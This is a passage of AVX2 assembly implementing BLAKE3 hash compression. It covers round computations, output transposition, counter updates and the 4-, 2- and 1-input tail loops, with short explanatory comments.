vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x60]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x140]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0xC0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xE0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x160]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0xA0]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x20]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x100]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x1E0]
vpaddd ymm1, ymm1, ymmword ptr [rsp]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x120]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xC0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x1C0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x40]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x60]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xE0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x140]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x180]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x80]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1A0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vpxor ymm0, ymm0, ymm8
vpxor ymm1, ymm1, ymm9
vpxor ymm2, ymm2, ymm10
vpxor ymm3, ymm3, ymm11
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpxor ymm4, ymm4, ymm12
vpxor ymm5, ymm5, ymm13
vpxor ymm6, ymm6, ymm14
vpxor ymm7, ymm7, ymm15
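// Note: movzx leaves RFLAGS untouched, so the jne below still acts on the
// cmp rdx, r15 performed at the top of this per-block loop.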
movzx eax, byte ptr [rbp+0x38]
jne 9b
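// Batch done: transpose the eight per-word state registers back into eight
// contiguous 32-byte chaining values and store them to the output buffer.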
mov rbx, qword ptr [rbp+0x50]
vunpcklps ymm8, ymm0, ymm1
vunpcklps ymm9, ymm2, ymm3
vunpckhps ymm10, ymm0, ymm1
vunpcklps ymm11, ymm4, ymm5
vunpcklps ymm0, ymm6, ymm7
vshufps ymm12, ymm8, ymm9, 78
vblendps ymm1, ymm8, ymm12, 0xCC
vshufps ymm8, ymm11, ymm0, 78
vunpckhps ymm13, ymm2, ymm3
vblendps ymm2, ymm11, ymm8, 0xCC
vblendps ymm3, ymm12, ymm9, 0xCC
vperm2f128 ymm12, ymm1, ymm2, 0x20
vmovups ymmword ptr [rbx], ymm12
vunpckhps ymm14, ymm4, ymm5
vblendps ymm4, ymm8, ymm0, 0xCC
vunpckhps ymm15, ymm6, ymm7
vperm2f128 ymm7, ymm3, ymm4, 0x20
vmovups ymmword ptr [rbx+0x20], ymm7
vshufps ymm5, ymm10, ymm13, 78
vblendps ymm6, ymm5, ymm13, 0xCC
vshufps ymm13, ymm14, ymm15, 78
vblendps ymm10, ymm10, ymm5, 0xCC
vblendps ymm14, ymm14, ymm13, 0xCC
vperm2f128 ymm8, ymm10, ymm14, 0x20
vmovups ymmword ptr [rbx+0x40], ymm8
vblendps ymm15, ymm13, ymm15, 0xCC
vperm2f128 ymm13, ymm6, ymm15, 0x20
vmovups ymmword ptr [rbx+0x60], ymm13
vperm2f128 ymm9, ymm1, ymm2, 0x31
vperm2f128 ymm11, ymm3, ymm4, 0x31
vmovups ymmword ptr [rbx+0x80], ymm9
vperm2f128 ymm14, ymm10, ymm14, 0x31
vperm2f128 ymm15, ymm6, ymm15, 0x31
vmovups ymmword ptr [rbx+0xA0], ymm11
vmovups ymmword ptr [rbx+0xC0], ymm14
vmovups ymmword ptr [rbx+0xE0], ymm15
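// Advance the 8-lane block counters: add the increment vector, then derive
// the carry into the high words via a signed compare after flipping the MSBs.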
vmovdqa ymm0, ymmword ptr [rsp+0x220]
vpaddd ymm1, ymm0, ymmword ptr [rsp+0x240]
vmovdqa ymmword ptr [rsp+0x240], ymm1
vpxor ymm0, ymm0, ymmword ptr [CMP_MSB_MASK+rip]
vpxor ymm2, ymm1, ymmword ptr [CMP_MSB_MASK+rip]
vpcmpgtd ymm2, ymm0, ymm2
vmovdqa ymm0, ymmword ptr [rsp+0x260]
vpsubd ymm2, ymm0, ymm2
vmovdqa ymmword ptr [rsp+0x260], ymm2
add rdi, 64
add rbx, 256
mov qword ptr [rbp+0x50], rbx
sub rsi, 8
cmp rsi, 8
jnc 2b
test rsi, rsi
jnz 3f
4:
vzeroupper
mov rsp, rbp
pop rbp
pop rbx
pop r12
pop r13
pop r14
pop r15
ret
.p2align 5
3:
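// Fewer than eight inputs remain: fall through to the 4-, 2-, and 1-input tails.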
mov rbx, qword ptr [rbp+0x50]
mov r15, qword ptr [rsp+0x2A0]
movzx r13d, byte ptr [rbp+0x38]
movzx r12d, byte ptr [rbp+0x48]
test rsi, 0x4
je 3f
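// 4-input tail: one input per 128-bit lane, so two YMM state copies
// (ymm0-3 and ymm8-11) cover all four inputs.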
vbroadcasti128 ymm0, xmmword ptr [rcx]
vbroadcasti128 ymm1, xmmword ptr [rcx+0x10]
vmovdqa ymm8, ymm0
vmovdqa ymm9, ymm1
vbroadcasti128 ymm12, xmmword ptr [rsp+0x240]
vbroadcasti128 ymm13, xmmword ptr [rsp+0x260]
vpunpckldq ymm14, ymm12, ymm13
vpunpckhdq ymm15, ymm12, ymm13
vpermq ymm14, ymm14, 0x50
vpermq ymm15, ymm15, 0x50
vbroadcasti128 ymm12, xmmword ptr [BLAKE3_BLOCK_LEN+rip]
vpblendd ymm14, ymm14, ymm12, 0x44
vpblendd ymm15, ymm15, ymm12, 0x44
vmovdqa ymmword ptr [rsp], ymm14
vmovdqa ymmword ptr [rsp+0x20], ymm15
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
.p2align 5
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
mov dword ptr [rsp+0x200], eax
vmovups ymm2, ymmword ptr [r8+rdx-0x40]
vinsertf128 ymm2, ymm2, xmmword ptr [r9+rdx-0x40], 0x01
vmovups ymm3, ymmword ptr [r8+rdx-0x30]
vinsertf128 ymm3, ymm3, xmmword ptr [r9+rdx-0x30], 0x01
vshufps ymm4, ymm2, ymm3, 136
vshufps ymm5, ymm2, ymm3, 221
vmovups ymm2, ymmword ptr [r8+rdx-0x20]
vinsertf128 ymm2, ymm2, xmmword ptr [r9+rdx-0x20], 0x01
vmovups ymm3, ymmword ptr [r8+rdx-0x10]
vinsertf128 ymm3, ymm3, xmmword ptr [r9+rdx-0x10], 0x01
vshufps ymm6, ymm2, ymm3, 136
vshufps ymm7, ymm2, ymm3, 221
vpshufd ymm6, ymm6, 0x93
vpshufd ymm7, ymm7, 0x93
vmovups ymm10, ymmword ptr [r10+rdx-0x40]
vinsertf128 ymm10, ymm10, xmmword ptr [r11+rdx-0x40], 0x01
vmovups ymm11, ymmword ptr [r10+rdx-0x30]
vinsertf128 ymm11, ymm11, xmmword ptr [r11+rdx-0x30], 0x01
vshufps ymm12, ymm10, ymm11, 136
vshufps ymm13, ymm10, ymm11, 221
vmovups ymm10, ymmword ptr [r10+rdx-0x20]
vinsertf128 ymm10, ymm10, xmmword ptr [r11+rdx-0x20], 0x01
vmovups ymm11, ymmword ptr [r10+rdx-0x10]
vinsertf128 ymm11, ymm11, xmmword ptr [r11+rdx-0x10], 0x01
vshufps ymm14, ymm10, ymm11, 136
vshufps ymm15, ymm10, ymm11, 221
vpshufd ymm14, ymm14, 0x93
vpshufd ymm15, ymm15, 0x93
prefetcht0 [r8+rdx+0x80]
prefetcht0 [r9+rdx+0x80]
prefetcht0 [r10+rdx+0x80]
prefetcht0 [r11+rdx+0x80]
vpbroadcastd ymm2, dword ptr [rsp+0x200]
vmovdqa ymm3, ymmword ptr [rsp]
vmovdqa ymm11, ymmword ptr [rsp+0x20]
vpblendd ymm3, ymm3, ymm2, 0x88
vpblendd ymm11, ymm11, ymm2, 0x88
vbroadcasti128 ymm2, xmmword ptr [BLAKE3_IV+rip]
vmovdqa ymm10, ymm2
mov al, 7
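// Seven BLAKE3 rounds; al counts down.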
9:
vpaddd ymm0, ymm0, ymm4
vpaddd ymm8, ymm8, ymm12
vmovdqa ymmword ptr [rsp+0x40], ymm4
nop
vmovdqa ymmword ptr [rsp+0x60], ymm12
nop
vpaddd ymm0, ymm0, ymm1
vpaddd ymm8, ymm8, ymm9
vpxor ymm3, ymm3, ymm0
vpxor ymm11, ymm11, ymm8
vbroadcasti128 ymm4, xmmword ptr [ROT16+rip]
vpshufb ymm3, ymm3, ymm4
vpshufb ymm11, ymm11, ymm4
vpaddd ymm2, ymm2, ymm3
vpaddd ymm10, ymm10, ymm11
vpxor ymm1, ymm1, ymm2
vpxor ymm9, ymm9, ymm10
vpsrld ymm4, ymm1, 12
vpslld ymm1, ymm1, 20
vpor ymm1, ymm1, ymm4
vpsrld ymm4, ymm9, 12
vpslld ymm9, ymm9, 20
vpor ymm9, ymm9, ymm4
vpaddd ymm0, ymm0, ymm5
vpaddd ymm8, ymm8, ymm13
vpaddd ymm0, ymm0, ymm1
vpaddd ymm8, ymm8, ymm9
vmovdqa ymmword ptr [rsp+0x80], ymm5
vmovdqa ymmword ptr [rsp+0xA0], ymm13
vpxor ymm3, ymm3, ymm0
vpxor ymm11, ymm11, ymm8
vbroadcasti128 ymm4, xmmword ptr [ROT8+rip]
vpshufb ymm3, ymm3, ymm4
vpshufb ymm11, ymm11, ymm4
vpaddd ymm2, ymm2, ymm3
vpaddd ymm10, ymm10, ymm11
vpxor ymm1, ymm1, ymm2
vpxor ymm9, ymm9, ymm10
vpsrld ymm4, ymm1, 7
vpslld ymm1, ymm1, 25
vpor ymm1, ymm1, ymm4
vpsrld ymm4, ymm9, 7
vpslld ymm9, ymm9, 25
vpor ymm9, ymm9, ymm4
vpshufd ymm0, ymm0, 0x93
vpshufd ymm8, ymm8, 0x93
vpshufd ymm3, ymm3, 0x4E
vpshufd ymm11, ymm11, 0x4E
vpshufd ymm2, ymm2, 0x39
vpshufd ymm10, ymm10, 0x39
vpaddd ymm0, ymm0, ymm6
vpaddd ymm8, ymm8, ymm14
vpaddd ymm0, ymm0, ymm1
vpaddd ymm8, ymm8, ymm9
vpxor ymm3, ymm3, ymm0
vpxor ymm11, ymm11, ymm8
vbroadcasti128 ymm4, xmmword ptr [ROT16+rip]
vpshufb ymm3, ymm3, ymm4
vpshufb ymm11, ymm11, ymm4
vpaddd ymm2, ymm2, ymm3
vpaddd ymm10, ymm10, ymm11
vpxor ymm1, ymm1, ymm2
vpxor ymm9, ymm9, ymm10
vpsrld ymm4, ymm1, 12
vpslld ymm1, ymm1, 20
vpor ymm1, ymm1, ymm4
vpsrld ymm4, ymm9, 12
vpslld ymm9, ymm9, 20
vpor ymm9, ymm9, ymm4
vpaddd ymm0, ymm0, ymm7
vpaddd ymm8, ymm8, ymm15
vpaddd ymm0, ymm0, ymm1
vpaddd ymm8, ymm8, ymm9
vpxor ymm3, ymm3, ymm0
vpxor ymm11, ymm11, ymm8
vbroadcasti128 ymm4, xmmword ptr [ROT8+rip]
vpshufb ymm3, ymm3, ymm4
vpshufb ymm11, ymm11, ymm4
vpaddd ymm2, ymm2, ymm3
vpaddd ymm10, ymm10, ymm11
vpxor ymm1, ymm1, ymm2
vpxor ymm9, ymm9, ymm10
vpsrld ymm4, ymm1, 7
vpslld ymm1, ymm1, 25
vpor ymm1, ymm1, ymm4
vpsrld ymm4, ymm9, 7
vpslld ymm9, ymm9, 25
vpor ymm9, ymm9, ymm4
vpshufd ymm0, ymm0, 0x39
vpshufd ymm8, ymm8, 0x39
vpshufd ymm3, ymm3, 0x4E
vpshufd ymm11, ymm11, 0x4E
vpshufd ymm2, ymm2, 0x93
vpshufd ymm10, ymm10, 0x93
dec al
je 9f
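// Not the last round: apply the BLAKE3 message permutation to both
// message-register groups before looping.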
vmovdqa ymm4, ymmword ptr [rsp+0x40]
vmovdqa ymm5, ymmword ptr [rsp+0x80]
vshufps ymm12, ymm4, ymm5, 214
vpshufd ymm13, ymm4, 0x0F
vpshufd ymm4, ymm12, 0x39
vshufps ymm12, ymm6, ymm7, 250
vpblendd ymm13, ymm13, ymm12, 0xAA
vpunpcklqdq ymm12, ymm7, ymm5
vpblendd ymm12, ymm12, ymm6, 0x88
vpshufd ymm12, ymm12, 0x78
vpunpckhdq ymm5, ymm5, ymm7
vpunpckldq ymm6, ymm6, ymm5
vpshufd ymm7, ymm6, 0x1E
vmovdqa ymmword ptr [rsp+0x40], ymm13
vmovdqa ymmword ptr [rsp+0x80], ymm12
vmovdqa ymm12, ymmword ptr [rsp+0x60]
vmovdqa ymm13, ymmword ptr [rsp+0xA0]
vshufps ymm5, ymm12, ymm13, 214
vpshufd ymm6, ymm12, 0x0F
vpshufd ymm12, ymm5, 0x39
vshufps ymm5, ymm14, ymm15, 250
vpblendd ymm6, ymm6, ymm5, 0xAA
vpunpcklqdq ymm5, ymm15, ymm13
vpblendd ymm5, ymm5, ymm14, 0x88
vpshufd ymm5, ymm5, 0x78
vpunpckhdq ymm13, ymm13, ymm15
vpunpckldq ymm14, ymm14, ymm13
vpshufd ymm15, ymm14, 0x1E
vmovdqa ymm13, ymm6
vmovdqa ymm14, ymm5
vmovdqa ymm5, ymmword ptr [rsp+0x40]
vmovdqa ymm6, ymmword ptr [rsp+0x80]
jmp 9b
9:
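// Feed forward: xor rows 2-3 into rows 0-1 to form the output CVs.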
vpxor ymm0, ymm0, ymm2
vpxor ymm1, ymm1, ymm3
vpxor ymm8, ymm8, ymm10
vpxor ymm9, ymm9, ymm11
mov eax, r13d
cmp rdx, r15
jne 2b
vmovdqu xmmword ptr [rbx], xmm0
vmovdqu xmmword ptr [rbx+0x10], xmm1
vextracti128 xmmword ptr [rbx+0x20], ymm0, 0x01
vextracti128 xmmword ptr [rbx+0x30], ymm1, 0x01
vmovdqu xmmword ptr [rbx+0x40], xmm8
vmovdqu xmmword ptr [rbx+0x50], xmm9
vextracti128 xmmword ptr [rbx+0x60], ymm8, 0x01
vextracti128 xmmword ptr [rbx+0x70], ymm9, 0x01
vmovaps xmm8, xmmword ptr [rsp+0x280]
vmovaps xmm0, xmmword ptr [rsp+0x240]
vmovaps xmm1, xmmword ptr [rsp+0x250]
vmovaps xmm2, xmmword ptr [rsp+0x260]
vmovaps xmm3, xmmword ptr [rsp+0x270]
vblendvps xmm0, xmm0, xmm1, xmm8
vblendvps xmm2, xmm2, xmm3, xmm8
vmovaps xmmword ptr [rsp+0x240], xmm0
vmovaps xmmword ptr [rsp+0x260], xmm2
add rbx, 128
add rdi, 32
sub rsi, 4
3:
test rsi, 0x2
je 3f
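// 2-input tail: one input per 128-bit lane of a single YMM state.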
vbroadcasti128 ymm0, xmmword ptr [rcx]
vbroadcasti128 ymm1, xmmword ptr [rcx+0x10]
vmovd xmm13, dword ptr [rsp+0x240]
vpinsrd xmm13, xmm13, dword ptr [rsp+0x260], 1
vpinsrd xmm13, xmm13, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
vmovd xmm14, dword ptr [rsp+0x244]
vpinsrd xmm14, xmm14, dword ptr [rsp+0x264], 1
vpinsrd xmm14, xmm14, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
vinserti128 ymm13, ymm13, xmm14, 0x01
vbroadcasti128 ymm14, xmmword ptr [ROT16+rip]
vbroadcasti128 ymm15, xmmword ptr [ROT8+rip]
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
.p2align 5
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
mov dword ptr [rsp+0x200], eax
vbroadcasti128 ymm2, xmmword ptr [BLAKE3_IV+rip]
vpbroadcastd ymm8, dword ptr [rsp+0x200]
vpblendd ymm3, ymm13, ymm8, 0x88
vmovups ymm8, ymmword ptr [r8+rdx-0x40]
vinsertf128 ymm8, ymm8, xmmword ptr [r9+rdx-0x40], 0x01
vmovups ymm9, ymmword ptr [r8+rdx-0x30]
vinsertf128 ymm9, ymm9, xmmword ptr [r9+rdx-0x30], 0x01
vshufps ymm4, ymm8, ymm9, 136
vshufps ymm5, ymm8, ymm9, 221
vmovups ymm8, ymmword ptr [r8+rdx-0x20]
vinsertf128 ymm8, ymm8, xmmword ptr [r9+rdx-0x20], 0x01
vmovups ymm9, ymmword ptr [r8+rdx-0x10]
vinsertf128 ymm9, ymm9, xmmword ptr [r9+rdx-0x10], 0x01
vshufps ymm6, ymm8, ymm9, 136
vshufps ymm7, ymm8, ymm9, 221
vpshufd ymm6, ymm6, 0x93
vpshufd ymm7, ymm7, 0x93
mov al, 7
9:
vpaddd ymm0, ymm0, ymm4
vpaddd ymm0, ymm0, ymm1
vpxor ymm3, ymm3, ymm0
vpshufb ymm3, ymm3, ymm14
vpaddd ymm2, ymm2, ymm3
vpxor ymm1, ymm1, ymm2
vpsrld ymm8, ymm1, 12
vpslld ymm1, ymm1, 20
vpor ymm1, ymm1, ymm8
vpaddd ymm0, ymm0, ymm5
vpaddd ymm0, ymm0, ymm1
vpxor ymm3, ymm3, ymm0
vpshufb ymm3, ymm3, ymm15
vpaddd ymm2, ymm2, ymm3
vpxor ymm1, ymm1, ymm2
vpsrld ymm8, ymm1, 7
vpslld ymm1, ymm1, 25
vpor ymm1, ymm1, ymm8
vpshufd ymm0, ymm0, 0x93
vpshufd ymm3, ymm3, 0x4E
vpshufd ymm2, ymm2, 0x39
vpaddd ymm0, ymm0, ymm6
vpaddd ymm0, ymm0, ymm1
vpxor ymm3, ymm3, ymm0
vpshufb ymm3, ymm3, ymm14
vpaddd ymm2, ymm2, ymm3
vpxor ymm1, ymm1, ymm2
vpsrld ymm8, ymm1, 12
vpslld ymm1, ymm1, 20
vpor ymm1, ymm1, ymm8
vpaddd ymm0, ymm0, ymm7
vpaddd ymm0, ymm0, ymm1
vpxor ymm3, ymm3, ymm0
vpshufb ymm3, ymm3, ymm15
vpaddd ymm2, ymm2, ymm3
vpxor ymm1, ymm1, ymm2
vpsrld ymm8, ymm1, 7
vpslld ymm1, ymm1, 25
vpor ymm1, ymm1, ymm8
vpshufd ymm0, ymm0, 0x39
vpshufd ymm3, ymm3, 0x4E
vpshufd ymm2, ymm2, 0x93
dec al
jz 9f
vshufps ymm8, ymm4, ymm5, 214
vpshufd ymm9, ymm4, 0x0F
vpshufd ymm4, ymm8, 0x39
vshufps ymm8, ymm6, ymm7, 250
vpblendd ymm9, ymm9, ymm8, 0xAA
vpunpcklqdq ymm8, ymm7, ymm5
vpblendd ymm8, ymm8, ymm6, 0x88
vpshufd ymm8, ymm8, 0x78
vpunpckhdq ymm5, ymm5, ymm7
vpunpckldq ymm6, ymm6, ymm5
vpshufd ymm7, ymm6, 0x1E
vmovdqa ymm5, ymm9
vmovdqa ymm6, ymm8
jmp 9b
9:
vpxor ymm0, ymm0, ymm2
vpxor ymm1, ymm1, ymm3
mov eax, r13d
cmp rdx, r15
jne 2b
vmovdqu xmmword ptr [rbx], xmm0
vmovdqu xmmword ptr [rbx+0x10], xmm1
vextracti128 xmmword ptr [rbx+0x20], ymm0, 0x01
vextracti128 xmmword ptr [rbx+0x30], ymm1, 0x01
vmovaps ymm8, ymmword ptr [rsp+0x280]
vmovaps ymm0, ymmword ptr [rsp+0x240]
vmovups ymm1, ymmword ptr [rsp+0x248]
vmovaps ymm2, ymmword ptr [rsp+0x260]
vmovups ymm3, ymmword ptr [rsp+0x268]
vblendvps ymm0, ymm0, ymm1, ymm8
vblendvps ymm2, ymm2, ymm3, ymm8
vmovaps ymmword ptr [rsp+0x240], ymm0
vmovaps ymmword ptr [rsp+0x260], ymm2
add rbx, 64
add rdi, 16
sub rsi, 2
3:
test rsi, 0x1
je 4b
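// 1-input tail: plain 128-bit compression loop.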
vmovdqu xmm0, xmmword ptr [rcx]
vmovdqu xmm1, xmmword ptr [rcx+0x10]
vmovd xmm3, dword ptr [rsp+0x240]
vpinsrd xmm3, xmm3, dword ptr [rsp+0x260], 1
vpinsrd xmm13, xmm3, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
vmovdqa xmm14, xmmword ptr [ROT16+rip]
vmovdqa xmm15, xmmword ptr [ROT8+rip]
mov r8, qword ptr [rdi]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
.p2align 5
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
vmovdqa xmm2, xmmword ptr [BLAKE3_IV+rip]
vmovdqa xmm3, xmm13
vpinsrd xmm3, xmm3, eax, 3
vmovups xmm8, xmmword ptr [r8+rdx-0x40]
vmovups xmm9, xmmword ptr [r8+rdx-0x30]
vshufps xmm4, xmm8, xmm9, 136
vshufps xmm5, xmm8, xmm9, 221
vmovups xmm8, xmmword ptr [r8+rdx-0x20]
vmovups xmm9, xmmword ptr [r8+rdx-0x10]
vshufps xmm6, xmm8, xmm9, 136
vshufps xmm7, xmm8, xmm9, 221
vpshufd xmm6, xmm6, 0x93
vpshufd xmm7, xmm7, 0x93
mov al, 7
9:
vpaddd xmm0, xmm0, xmm4
vpaddd xmm0, xmm0, xmm1
vpxor xmm3, xmm3, xmm0
vpshufb xmm3, xmm3, xmm14
vpaddd xmm2, xmm2, xmm3
vpxor xmm1, xmm1, xmm2
vpsrld xmm8, xmm1, 12
vpslld xmm1, xmm1, 20
vpor xmm1, xmm1, xmm8
vpaddd xmm0, xmm0, xmm5
vpaddd xmm0, xmm0, xmm1
vpxor xmm3, xmm3, xmm0
vpshufb xmm3, xmm3, xmm15
vpaddd xmm2, xmm2, xmm3
vpxor xmm1, xmm1, xmm2
vpsrld xmm8, xmm1, 7
vpslld xmm1, xmm1, 25
vpor xmm1, xmm1, xmm8
vpshufd xmm0, xmm0, 0x93
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x39
vpaddd xmm0, xmm0, xmm6
vpaddd xmm0, xmm0, xmm1
vpxor xmm3, xmm3, xmm0
vpshufb xmm3, xmm3, xmm14
vpaddd xmm2, xmm2, xmm3
vpxor xmm1, xmm1, xmm2
vpsrld xmm8, xmm1, 12
vpslld xmm1, xmm1, 20
vpor xmm1, xmm1, xmm8
vpaddd xmm0, xmm0, xmm7
vpaddd xmm0, xmm0, xmm1
vpxor xmm3, xmm3, xmm0
vpshufb xmm3, xmm3, xmm15
vpaddd xmm2, xmm2, xmm3
vpxor xmm1, xmm1, xmm2
vpsrld xmm8, xmm1, 7
vpslld xmm1, xmm1, 25
vpor xmm1, xmm1, xmm8
vpshufd xmm0, xmm0, 0x39
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x93
dec al
jz 9f
vshufps xmm8, xmm4, xmm5, 214
vpshufd xmm9, xmm4, 0x0F
